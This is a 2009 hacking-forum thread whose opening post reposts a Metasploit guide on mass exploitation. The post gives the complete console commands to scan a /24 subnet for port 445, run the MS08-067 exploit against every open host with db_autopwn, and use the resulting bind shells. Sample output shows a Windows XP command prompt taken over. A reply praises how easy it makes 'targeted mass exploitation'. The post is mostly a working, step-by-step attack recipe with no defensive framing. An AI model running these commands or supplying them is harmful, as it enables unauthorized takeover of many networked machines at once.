|
» Metasploit Mass Exploitation for Dummies| Register | Blogs | Members List | Search | Today's Posts | Mark Forums Read |
|
| Register | Blogs | Members List | Search | Today's Posts | Mark Forums Read |
| Offensive Guides & Information This is where you can post your guides. |
 #1
18th February 2009, 10:58
| ||||
| ||||
| Metasploit Mass Exploitation for Dummies [Thanks to HD Moore for making this brief guide] One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time. In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C. To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver. msf > load db_sqlite3[*] Successfully loaded plugin: db_sqlite3 Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance: msf > db_create[*] The specified database already exists, connecting[*] Successfully connected to the database[*] File: /root/.msf3/sqlite3.db To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below: msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24 Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name: msf > db_autopwn -e -p -b -m ms08_067 Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session. msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86 msf > sessions -i 1[*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Enjoy! ~ MaXe
__________________  Quote:
 |
|
#2
20th February 2009, 15:03
| ||||
| ||||
| Re: Metasploit Mass Exploitation for Dummies
Indeed, it makes it a lot more easy to make targeted mass exploitation!
__________________ Quote:
|
 |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
| |
LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/offensive-guides-information/853-metasploit-mass-exploitation-dummies.html | ||||
| Posted By | For | Type | Date | |
| el blog de stalin | This thread | Refback | 16th August 2009 22:28 | |
|
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| [Cross Platform] exdump.py - mass exploit searcher and downloader | s3my0n | Hacking Tools & Utilities | 2 | 7th March 2010 00:50 |
| Mass Milw0rm Exploit Finder and Downloader | s3my0n | Hacking Tools & Utilities | 7 | 24th February 2010 15:44 |
| [exploitation] Smashing the Stack for Fun and Profit | s3my0n | Offensive Guides & Information | 1 | 22nd December 2009 15:44 |
| [Cross Platform] SecurityForest ~ ExploitTree & Exploitation Framework | MaXe | Hacking Tools & Utilities | 3 | 29th July 2008 12:48 |
Linear Mode
